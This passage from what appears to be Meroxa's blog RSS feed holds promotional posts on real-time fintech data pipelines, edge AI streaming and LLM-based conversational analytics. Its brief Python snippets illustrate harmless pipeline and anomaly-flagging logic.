&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/financial-data-processing.png&quot; alt=&quot;financial-data-processing.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Reduce Compliance Costs with Instant AML &amp;#x26; SOX Reporting—&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Schedule a Demo.&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Real-Time Pipeline Architecture for Fintech&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s &lt;strong&gt;Real-Time Pipeline Architecture&lt;/strong&gt;, leveraging &lt;strong&gt;Databricks&lt;/strong&gt;, enables fintech companies to process financial transactions instantly. The architecture ingests data from &lt;strong&gt;Point-of-Sale (POS) systems and payment gateways&lt;/strong&gt;, streaming it into &lt;strong&gt;Meroxa&lt;/strong&gt; for real-time enrichment and anomaly detection. The processed data is then stored in &lt;strong&gt;Databricks Delta Lake&lt;/strong&gt;, where AI models analyze transaction patterns, detect fraud, and generate risk scores. Automated fraud prevention and compliance workflows trigger &lt;strong&gt;instant alerts and actions&lt;/strong&gt;, notifying &lt;strong&gt;customers, bank administrators, and regulatory teams&lt;/strong&gt;.
&lt;img src=&quot;https://meroxa.com/img/finance.png&quot; alt=&quot;financial.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Example flow using Databricks&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Key Technologies in Modern Fintech Data Pipelines&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Modern fintech data pipelines rely on a &lt;strong&gt;high-performance technology stack&lt;/strong&gt; to ensure &lt;strong&gt;real-time data ingestion, processing, storage, AI-driven analytics, and compliance monitoring&lt;/strong&gt;. &lt;strong&gt;Ingestion layers&lt;/strong&gt; like Kafka, Pulsar, and Meroxa Conduit capture financial transactions and user activity instantly. &lt;strong&gt;Stream processing engines&lt;/strong&gt; such as Apache Flink and Spark Streaming enable &lt;strong&gt;fraud detection, anomaly detection, and risk scoring in milliseconds&lt;/strong&gt;. High-speed &lt;strong&gt;databases&lt;/strong&gt; like ClickHouse, Snowflake, and PostgreSQL provide &lt;strong&gt;sub-second querying for compliance and analytics&lt;/strong&gt;, while AI frameworks like TensorFlow and PyTorch power &lt;strong&gt;predictive fraud prevention and credit scoring models&lt;/strong&gt;. &lt;strong&gt;Visualization tools&lt;/strong&gt; like Grafana and Looker deliver &lt;strong&gt;real-time alerts and trading insights&lt;/strong&gt;, ensuring fintech companies stay ahead in an increasingly data-driven industry.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/fintech-data-pipelines.png&quot; alt=&quot;financial data processing.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Eliminate Latency in Fraud Detection—&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Talk to an Expert Today.&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Cost Breakdown: Meroxa&apos;s Conduit Platform vs Competitors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;When evaluating real-time data pipeline solutions, &lt;strong&gt;cost efficiency is critical&lt;/strong&gt; for fintech companies. &lt;strong&gt;Conduit Platform&lt;/strong&gt; offers a &lt;strong&gt;40% lower infrastructure cost&lt;/strong&gt; due to its auto-scaling capabilities, eliminating the need for expensive batch processing. Unlike competitors that require &lt;strong&gt;manual DevOps management&lt;/strong&gt; and complex tuning, Meroxa provides a &lt;strong&gt;fully managed, low-latency solution&lt;/strong&gt; with minimal operational overhead.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/meroxa-conduit-vs-competitors.png&quot; alt=&quot;meroxa-conduit-vs-competitors.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Optimize Your Fintech Data Stack&lt;/a&gt;—Cut Infrastructure &amp;#x26; Compliance Costs by 50% with Conduit Platform.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Cost Projections for Different Fintech Segments&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Fintech companies across various segments stand to gain &lt;strong&gt;significant cost savings and ROI&lt;/strong&gt; by implementing &lt;strong&gt;real-time data pipelines&lt;/strong&gt;. Digital banking and payments firms can &lt;strong&gt;reduce fraud-related chargebacks by 60%&lt;/strong&gt;, saving over &lt;strong&gt;$20M annually&lt;/strong&gt;, while high-frequency trading platforms can optimize execution speeds to &lt;strong&gt;cut slippage costs&lt;/strong&gt; by &lt;strong&gt;$15M+ per year&lt;/strong&gt;. Lending and credit scoring businesses can lower default rates, leading to &lt;strong&gt;$10M in savings&lt;/strong&gt;, and compliance automation can reduce regulatory fines, saving &lt;strong&gt;$8M annually&lt;/strong&gt;. Fraud prevention and risk management solutions see the &lt;strong&gt;biggest impact&lt;/strong&gt;, with potential savings of &lt;strong&gt;$30M+ annually&lt;/strong&gt; by detecting fraudulent transactions in under &lt;strong&gt;500ms&lt;/strong&gt;. Across all segments, real-time pipelines deliver &lt;strong&gt;high ROI, lower costs, and greater efficiency&lt;/strong&gt;, making them essential for fintech success.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Projected Cost Savings &amp;#x26; ROI by Fintech Segment&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/cost-saving-roi.png&quot; alt=&quot;cost-saving-roi.png&quot;&gt; &lt;em&gt;&lt;strong&gt;All savings are estimations.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Performance Benchmark: Meroxa&apos;s Conduit Platform vs Competitors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;When it comes to &lt;strong&gt;real-time data performance in fintech&lt;/strong&gt;, &lt;strong&gt;Meroxa&apos;s Conduit Platform&lt;/strong&gt; outpaces competitors with &lt;strong&gt;sub-500ms AI-powered fraud detection, sub-second transaction latency, and auto-scaling to handle over 1M TPS (transactions per second).&lt;/strong&gt; Unlike traditional batch-based solutions that introduce delays, Meroxa ensures &lt;strong&gt;instant compliance reporting, seamless fraud prevention, and optimized trading execution.&lt;/strong&gt; Compared to alternatives like &lt;strong&gt;Fivetran, Kafka Streams, and Confluent Cloud&lt;/strong&gt;, Meroxa delivers &lt;strong&gt;lower costs, minimal DevOps overhead, and built-in AI/ML integrations&lt;/strong&gt; for &lt;strong&gt;unmatched efficiency and scalability&lt;/strong&gt; in financial data processing.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/performance-benchmark.png&quot; alt=&quot;performance-benchmark.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Achieve Sub-500ms Fraud Detection &amp;#x26; Real-Time Compliance!&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion &amp;#x26; Next Steps&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit Platform provides a &lt;strong&gt;scalable, low-latency, AI-powered solution&lt;/strong&gt; designed specifically for &lt;strong&gt;fraud prevention, high-frequency trading, credit risk assessment, and compliance automation&lt;/strong&gt;. With &lt;strong&gt;sub-second transaction processing, auto-scaling capabilities, and built-in compliance features&lt;/strong&gt;, our platform enables fintech CTOs to &lt;strong&gt;future-proof their infrastructure, unlock cost savings, and drive long-term business growth&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;👉 &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Request a Demo&lt;/a&gt; | Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Unlocking the Power of Edge AI with Real-Time Streaming: From Sensors to Insights Using Meroxa]]></title><description><![CDATA[This blog explores how low-latency inference, hardware acceleration, and agile real-time data pipelines drive faster, smarter decision-making. Learn how Meroxa empowers organizations with seamless data ingestion, real-time analytics, and scalable infrastructure to bridge the gap between edge computing and actionable insights—unlocking the full potential of AI-driven innovation.]]></description><link>https://meroxa.com/blog/unlocking-the-power-of-edge-ai-with-real-time-streaming-from-sensors-to-insights-using-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/unlocking-the-power-of-edge-ai-with-real-time-streaming-from-sensors-to-insights-using-meroxa</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 11 Feb 2025 22:33:00 GMT</pubDate><content:encoded>&lt;p&gt;In today’s fast-paced digital world, the ability to process and analyze data right at its source is more than just an operational advantage—it’s a strategic imperative. As industries evolve and data volumes surge, the need for real-time insights has never been greater. This blog post explores how edge and on-device AI are transforming industries, and how Meroxa is at the forefront of this revolution by enabling seamless, low-latency data capture and processing.&lt;/p&gt;
&lt;h3&gt;Low-Latency Inference: The Heart of Real-Time Decision-Making&lt;/h3&gt;
&lt;h4&gt;Why Low-Latency Matters&lt;/h4&gt;
&lt;p&gt;At its core, low-latency inference is about reducing the delay between data generation and actionable insights. Traditional cloud-based architectures often involve sending data over long distances for processing—a delay that, in mission-critical applications, can mean the difference between success and failure. By moving the inference process closer to where the data is created, edge AI dramatically cuts down these delays, ensuring faster and more reliable decision-making.&lt;/p&gt;
&lt;h4&gt;Real-World Applications&lt;/h4&gt;
&lt;p&gt;Imagine a self-driving car navigating a busy city. Every millisecond counts as the vehicle processes sensor data to detect obstacles and plan safe routes. By performing inference on-device, the car can react instantly, bypassing the latency introduced by cloud communication. Similarly, industrial IoT applications—such as predictive maintenance on factory equipment—rely on real-time analysis to prevent costly downtime. For instance, a drone engaged in infrastructure inspection can instantly process visual data to identify structural anomalies, ensuring timely maintenance interventions. In these scenarios, on-device AI not only improves safety and operational efficiency but also minimizes dependence on constant cloud connectivity, safeguarding both assets and human lives.&lt;/p&gt;
&lt;h3&gt;Hardware Acceleration: Powering the Edge&lt;/h3&gt;
&lt;h4&gt;The Rise of Specialized Processors&lt;/h4&gt;
&lt;p&gt;The push for real-time performance has led to the integration of specialized hardware accelerators in edge devices. GPUs, TPUs, and FPGAs are increasingly common in applications where rapid data processing is essential. These processors are designed to handle the intensive computations required by modern AI algorithms, delivering high performance without compromising on energy efficiency.&lt;/p&gt;
&lt;h4&gt;Real-World Applications in Critical Industries&lt;/h4&gt;
&lt;p&gt;In healthcare, portable diagnostic devices and patient monitoring systems are being enhanced with on-device AI capabilities. Accelerators in these devices process medical images or sensor data in real time, facilitating faster diagnoses and immediate care decisions without compromising patient data privacy. Similarly, manufacturing robotics benefit from hardware acceleration by achieving precise, real-time control that ensures both productivity and safety on the factory floor.&lt;/p&gt;
&lt;p&gt;These specialized accelerators not only enhance processing speed but also reduce energy consumption—a crucial factor in edge environments where power efficiency is paramount. By offloading computationally intensive tasks to dedicated hardware, edge devices can maintain high performance while operating within the physical constraints of their deployment scenarios.&lt;/p&gt;
&lt;h3&gt;Real-Time Data Pipelines: The Backbone of Edge AI&lt;/h3&gt;
&lt;h4&gt;Enabling Continuous, Actionable Insights&lt;/h4&gt;
&lt;p&gt;For edge AI to deliver its promise of instantaneous insights, a robust and agile data pipeline is essential. Real-time data pipelines capture, ingest, process, and route data as it’s generated, allowing on-device AI models to analyze it almost immediately. This end-to-end approach minimizes delay and maximizes the impact of every data point collected.&lt;/p&gt;
&lt;h4&gt;How Meroxa Drives Real-Time Data Pipelines at the Edge&lt;/h4&gt;
&lt;p&gt;Meroxa’s platform is designed to excel in this environment. By providing a unified framework for real-time data capture and processing, Meroxa enables organizations to bridge the gap between edge devices and actionable insights. Here’s how Meroxa’s approach drives success:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Seamless Data Ingestion:&lt;/strong&gt; Meroxa efficiently captures data from diverse edge sources, ensuring that no critical piece of information is lost. Whether it’s sensor readings from industrial equipment or real-time telemetry from autonomous vehicles, the platform ingests data with minimal latency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streamlined Processing:&lt;/strong&gt; Once data is ingested, Meroxa’s real-time pipelines process and transform it on the fly. This enables AI models to perform inference immediately, ensuring that insights are generated and acted upon in near real time.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Integration:&lt;/strong&gt; Meroxa’s architecture is built to scale, accommodating the growing volume and variety of data generated at the edge. This scalability is essential for large enterprises that operate across multiple geographies and require a reliable, unified data infrastructure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Collaboration:&lt;/strong&gt; By integrating seamlessly with on-device intelligence, Meroxa not only accelerates data processing but also facilitates a collaborative ecosystem where edge and cloud systems work in tandem. This synergy ensures that organizations can leverage the best of both worlds—immediate, on-device insights and the broader analytical capabilities of cloud-based systems.&lt;/li&gt;
&lt;/ul&gt;
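&lt;p&gt;&lt;em&gt;As a rough sketch of the capture-standardize-route flow described above, a minimal streaming stage might look like the Python below. The class and function names here are illustrative assumptions, not Meroxa’s actual API.&lt;/em&gt;&lt;/p&gt;

```python
import json
import queue

# Illustrative sketch of an ingest-transform-route stage.
# Pipeline, ingest, run_once, and standardize are hypothetical names,
# not Meroxa's actual API.

class Pipeline:
    def __init__(self, transform, sink):
        self.buffer = queue.Queue()   # stand-in for a durable stream
        self.transform = transform    # on-the-fly processing step
        self.sink = sink              # downstream route (connector, model, dashboard)

    def ingest(self, raw_event):
        """Capture a raw event from an edge source with minimal latency."""
        self.buffer.put(raw_event)

    def run_once(self):
        """Process one buffered event: transform on the fly, then route it."""
        event = self.buffer.get()
        record = self.transform(event)
        self.sink(record)
        return record

def standardize(event):
    """Normalize heterogeneous sensor payloads into a common shape."""
    payload = json.loads(event)
    return {"device": payload["id"], "value": float(payload["reading"])}

results = []
p = Pipeline(standardize, results.append)
p.ingest('{"id": "sensor-1", "reading": "21.5"}')
p.run_once()
```

&lt;p&gt;&lt;em&gt;In a real deployment the buffer would be a durable stream and the sink a downstream connector, but the shape of the flow (capture, standardize, route) is the same.&lt;/em&gt;&lt;/p&gt;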
&lt;h3&gt;Real-World Use Cases: Data Acquisition in Action&lt;/h3&gt;
&lt;p&gt;Visualizing the data acquisition flow can clarify how Meroxa’s platform integrates with edge and on-device AI to deliver real-time insights. Consider these two real-world examples:&lt;/p&gt;
&lt;h3&gt;Healthcare Clinical Trials&lt;/h3&gt;
&lt;p&gt;In the context of clinical trials, a multitude of patient-generated data—ranging from wearable sensor metrics to diagnostic imaging—is collected and processed. The following diagram illustrates a typical data flow using Meroxa:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/health-clinical-trials.png&quot; alt=&quot;health-clinical-trials.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Explanation:&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Patient Devices / Clinical Trial Sensors:&lt;/strong&gt; These include wearable devices and diagnostic machines that continuously generate health-related data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Edge Gateway:&lt;/strong&gt; Data is initially captured at the edge, reducing transmission delays.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Data Ingestion Platform:&lt;/strong&gt; Meroxa ingests and standardizes data from various devices, ensuring consistency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Pipeline:&lt;/strong&gt; The ingested data is processed in real time, enabling immediate analytics.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;On-Device Inference &amp;#x26; Analytics:&lt;/strong&gt; Local AI models analyze the data, offering prompt insights for patient monitoring and clinical decision-making.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Analytics / Clinical Dashboards:&lt;/strong&gt; Processed insights are then aggregated and visualized on centralized dashboards for further analysis and regulatory reporting.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Manufacturing&lt;/h3&gt;
&lt;p&gt;In manufacturing environments, real-time data acquisition is critical for maintaining operational efficiency and safety. The following diagram demonstrates how Meroxa integrates with manufacturing processes:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/manufacturing-sensor.png&quot; alt=&quot;manufacturing-sensor.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Explanation:&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Manufacturing Equipment Sensors:&lt;/strong&gt; Sensors embedded in machinery generate continuous operational data (temperature, vibration, etc.).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Edge Data Aggregator:&lt;/strong&gt; Data from multiple sensors is collected at the edge, reducing latency and bandwidth use.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Data Ingestion:&lt;/strong&gt; The platform ingests aggregated data, standardizing it across various sources.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Pipeline:&lt;/strong&gt; Data is processed in real time to detect anomalies and trigger immediate responses.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;On-Device AI for Process Control:&lt;/strong&gt; Local AI models perform rapid analysis, enabling automated adjustments in machinery operation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Manufacturing Analytics Dashboard:&lt;/strong&gt; Insights are visualized on dashboards, allowing for proactive maintenance and process optimization.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Conclusion: Empowering the Future with Meroxa&lt;/h2&gt;
&lt;p&gt;Edge and on-device AI are no longer futuristic concepts—they are transforming the way industries operate today. By reducing latency through on-device inference, leveraging the power of specialized hardware, and deploying agile real-time data pipelines, organizations can unlock a new level of efficiency, safety, and innovation.&lt;/p&gt;
&lt;p&gt;Meroxa’s platform is not just about data capture; it’s about transforming that data into actionable insights, exactly when and where they are needed. For innovative companies seeking to drive competitive advantage and operational excellence, partnering with Meroxa means embracing a future where technology works seamlessly to empower every decision.&lt;/p&gt;
&lt;p&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[From Data to Decisions: How Generative AI is Transforming Business in Real-Time]]></title><description><![CDATA[ This blog explores how enterprises can leverage LLMs to extract instant value from continuous data streams and how conversational analytics is reshaping business intelligence. From financial services to retail, AI-powered data workflows are driving faster, smarter decisions—unlocking efficiency, scalability, and a strategic edge in a data-driven world.]]></description><link>https://meroxa.com/blog/from-data-to-decisions-how-generative-ai-is-transforming-business-in-real-time</link><guid isPermaLink="false">https://meroxa.com/blog/from-data-to-decisions-how-generative-ai-is-transforming-business-in-real-time</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 11 Feb 2025 15:53:00 GMT</pubDate><content:encoded>&lt;p&gt;At the current pace of this digital landscape, harnessing real-time data has become a game-changer for businesses. As the CEO of Meroxa, I&apos;ve witnessed firsthand how generative AI not only enhances data processing but fundamentally reshapes how organizations extract value from their continuous streams of information. Whether you&apos;re a mid-market enterprise or a Fortune 1000 company, embracing these technological advancements leads to transformative improvements in decision-making and operational efficiency. In this post, I&apos;ll explore how integrating large language models (LLMs) into data pipelines and leveraging conversational analytics are setting new standards for real-time applications.&lt;/p&gt;
&lt;h2&gt;Integrating LLMs into Real-Time Data Workflows&lt;/h2&gt;
&lt;h3&gt;The New Era of Data Pipelines&lt;/h3&gt;
&lt;p&gt;At its core, integrating LLMs into data workflows embeds intelligence throughout the data processing lifecycle—from ingestion to analysis. Traditional data pipelines focused on collecting and transforming data for batch processing. Now, with generative AI, organizations are shifting toward models that transform real-time data into actionable insights instantly.&lt;/p&gt;
&lt;p&gt;Consider a financial institution processing millions of transactions per minute. By incorporating a GPT-based LLM into its pipeline, the institution can automatically flag unusual patterns, assess risks in real time, and generate concise summaries of emerging market trends. This capability enhances operational agility while empowering decision-makers with immediate insights into potential risks and opportunities.&lt;/p&gt;
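&lt;p&gt;&lt;em&gt;To make the in-stream flagging step concrete, here is a deliberately simplified Python sketch. The statistical rule, the threshold, and the function names are illustrative assumptions; a production system would use a trained model, and a real LLM call would replace the summarization stub.&lt;/em&gt;&lt;/p&gt;

```python
import statistics

# Toy sketch of flagging unusual transactions in-stream before handing
# flagged items to an LLM for summarization. The z-score rule and the
# threshold are illustrative assumptions, not a real fraud model.

def flag_anomalies(amounts, threshold=2.0):
    """Return indices of transactions far from the batch norm."""
    mean = statistics.mean(amounts)
    stdev = statistics.pstdev(amounts)
    flagged = []
    for i, amount in enumerate(amounts):
        if stdev > 0 and abs(amount - mean) > threshold * stdev:
            flagged.append(i)
    return flagged

def summarize_for_analysts(amounts, flagged):
    """Stand-in for an LLM call that would produce a concise risk summary."""
    return f"{len(flagged)} of {len(amounts)} transactions flagged for review"

txns = [12.0, 14.5, 13.2, 11.9, 980.0, 12.7]
flagged = flag_anomalies(txns)
summary = summarize_for_analysts(txns, flagged)
```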
&lt;h3&gt;Real-World Example and Benefits&lt;/h3&gt;
&lt;p&gt;In retail—where consumer behavior and market sentiment shift rapidly—companies can integrate generative AI into streaming data feeds to monitor social media trends and point-of-sale transactions simultaneously. The LLM analyzes vast data volumes, creating real-time summaries that highlight changes in consumer preferences and emerging product trends. This enables marketing teams to quickly adjust campaigns while supply chain managers optimize inventory based on immediate demand signals.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Benefits:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Speed and Agility:&lt;/strong&gt; Real-time insights enable instant responses to emerging events.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource Optimization:&lt;/strong&gt; Automated summarization frees skilled analysts to focus on strategic work.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability:&lt;/strong&gt; Modern AI models efficiently handle high-volume streaming data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Accuracy:&lt;/strong&gt; Continuous model updates ensure insights stay timely and relevant.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Technical Workflow Diagram&lt;/h3&gt;
&lt;p&gt;Let me show you how a modern real-time data pipeline integrates LLMs, using Meroxa for data ingestion and processing. This diagram breaks down the key components and how they work together:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/technical-workflow-diagram.png&quot; alt=&quot;technical-workflow-diagram.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Raw data flows from multiple sources through Meroxa&apos;s platform for ingestion and preprocessing, then through LLM analysis, finally generating automated insights for dashboards and alerts.&lt;/p&gt;
&lt;h3&gt;Challenges to Consider&lt;/h3&gt;
&lt;p&gt;While the benefits are significant, integrating LLMs into real-time pipelines comes with key challenges. Data quality is paramount—the system requires clean, consistent, and secure information to function effectively. Processing real-time data through large models demands substantial computational power. To address this, organizations need scalable infrastructure and may need to implement edge computing to reduce latency. Additionally, robust security and data governance protocols must protect sensitive information throughout its journey.&lt;/p&gt;
&lt;h2&gt;The Rise of Conversational Analytics&lt;/h2&gt;
&lt;h3&gt;From Dashboards to Dialogues&lt;/h3&gt;
&lt;p&gt;The business intelligence (BI) landscape is evolving. Traditional dashboards and static reports are giving way to conversational analytics platforms that let users interact with data through natural language queries. Instead of waiting for detailed reports, executives can now ask questions like &quot;What were our top-selling products last month, and what factors drove their success?&quot;—and receive immediate, context-rich responses powered by GPT-based foundation models.&lt;/p&gt;
&lt;h3&gt;Enhancing User Experience and Decision-Making&lt;/h3&gt;
&lt;p&gt;Conversational analytics democratizes data access across organizations. Advanced data analysis is no longer confined to technical teams—executives, managers, and frontline employees can now engage with data using everyday language. This accessibility speeds up decision-making by delivering insights promptly in a user-friendly format.&lt;/p&gt;
&lt;p&gt;Interactive, chat-like interfaces transform data interaction into a dynamic dialogue. This approach cultivates data literacy throughout the organization, preventing insights from being siloed within select groups. By removing technical barriers, businesses enable their entire workforce to participate in data-driven decision-making.&lt;/p&gt;
&lt;h3&gt;Technical Architecture for Conversational Analytics&lt;/h3&gt;
&lt;p&gt;In this architecture, a natural language query initiated by a user is processed by a conversational interface that leverages a GPT-based model. The query is then further refined and processed before data is retrieved and transformed by Meroxa’s real-time data store. This transformed data is used to generate an immediate, actionable response for the user.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/technical-architecture-for-conversational-analytics.png&quot; alt=&quot;Technical Architecture for Conversational Analytics.png&quot;&gt;&lt;/p&gt;
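&lt;p&gt;&lt;em&gt;The flow in this architecture can be sketched end to end in a few lines of Python. Below, a regular expression stands in for the GPT-based query-understanding step and a plain list stands in for Meroxa’s real-time data store; every name and the sample data are illustrative, not a real API.&lt;/em&gt;&lt;/p&gt;

```python
import re

# Toy sketch of conversational analytics: a natural-language query is
# turned into a structured filter (the "LLM" step, stubbed with a regex),
# applied to a data store (a plain list here), and summarized as a response.

SALES = [
    {"product": "widget", "month": "2025-01", "units": 120},
    {"product": "gadget", "month": "2025-01", "units": 340},
    {"product": "widget", "month": "2025-02", "units": 95},
]

def parse_query(question):
    """Stand-in for the GPT step: extract a month filter from the text."""
    match = re.search(r"(\d{4}-\d{2})", question)
    return {"month": match.group(1)} if match else {}

def answer(question):
    """Retrieve matching rows and generate an immediate response."""
    filters = parse_query(question)
    rows = [r for r in SALES if all(r[k] == v for k, v in filters.items())]
    top = max(rows, key=lambda r: r["units"])
    return f"Top seller: {top['product']} ({top['units']} units)"
```

&lt;p&gt;&lt;em&gt;A real deployment would swap the regex for an LLM that emits a structured query, and the list for a live stream-backed store; the query-refine-retrieve-respond shape stays the same.&lt;/em&gt;&lt;/p&gt;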
&lt;h3&gt;Driving Business Value&lt;/h3&gt;
&lt;p&gt;For technical business decision-makers, the value proposition of conversational analytics is clear and compelling:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Accessibility:&lt;/strong&gt; Natural language queries eliminate dependence on technical specialists, democratizing data insights across the organization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Faster Insights:&lt;/strong&gt; Real-time, interactive querying bridges the gap between data generation and action—essential in today&apos;s fast-moving markets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cost Efficiency:&lt;/strong&gt; Automated analysis reduces the operational costs traditionally associated with BI systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Competitive Edge:&lt;/strong&gt; Organizations that quickly interpret and act on real-time data gain a decisive market advantage.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Strategic Implications for Business Leaders&lt;/h2&gt;
&lt;h3&gt;Embracing the Future Today&lt;/h3&gt;
&lt;p&gt;The integration of generative AI into real-time applications isn&apos;t just a technological trend—it&apos;s a strategic imperative. For technical business decision-makers, the ability to extract immediate, actionable insights from data streams drives revenue growth, enhances operational efficiency, and mitigates risks.&lt;/p&gt;
&lt;p&gt;At Meroxa, we empower organizations to seamlessly integrate these cutting-edge technologies into their existing data workflows. By connecting real-time data ingestion with AI-driven analytics, we help businesses unlock generative AI&apos;s full potential.&lt;/p&gt;
&lt;h3&gt;Overcoming Barriers and Building a Data-Driven Culture&lt;/h3&gt;
&lt;p&gt;While adopting generative AI presents challenges—from data quality to computational demands—the rewards far outweigh the investment. Enhanced decision-making, operational agility, and market competitiveness await organizations that commit to this transformation. Success hinges on fostering a culture that embraces data-driven insights and invests in the right infrastructure and talent.&lt;/p&gt;
&lt;p&gt;Whether you&apos;re just beginning your digital transformation or looking to accelerate it, now is the time to explore how generative AI can revolutionize your data strategy. The strategic advantages of streamlined data pipelines and intuitive analytics tools are undeniable.&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;In today&apos;s world of constant change and endless data flows, generative AI in real-time applications isn&apos;t optional—it&apos;s essential. By combining LLMs with data pipelines and conversational analytics, businesses can achieve unprecedented levels of insight, efficiency, and agility. At Meroxa, we envision data not just as something to collect, but as a strategic asset that powers informed decisions and creates lasting competitive advantages.&lt;/p&gt;
&lt;p&gt;I urge technical business decision-makers, from mid-market enterprises to Fortune 1000 companies, to embrace these transformative technologies. This step will position your organization to not just succeed in a data-driven world, but to pioneer the next wave of business innovation.&lt;/p&gt;
&lt;p&gt;Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[🎉 Celebrating Three Years of Conduit: A Revolution in Real-Time Data Streaming!]]></title><description><![CDATA[As we mark the 3-year anniversary of Conduit Platform, we reflect on the incredible journey of innovation, scalability, and real-time data movement. Over the past three years, Conduit has transformed the way developers and data professionals build pipelines, enabling seamless data integration across diverse sources.  

In this blog, we’ll look back at our biggest milestones, customer success stories, and the groundbreaking features that set Conduit apart. From powering real-time analytics to AI-driven data processing, Conduit has continued to push the boundaries of what’s possible in modern data infrastructure.  

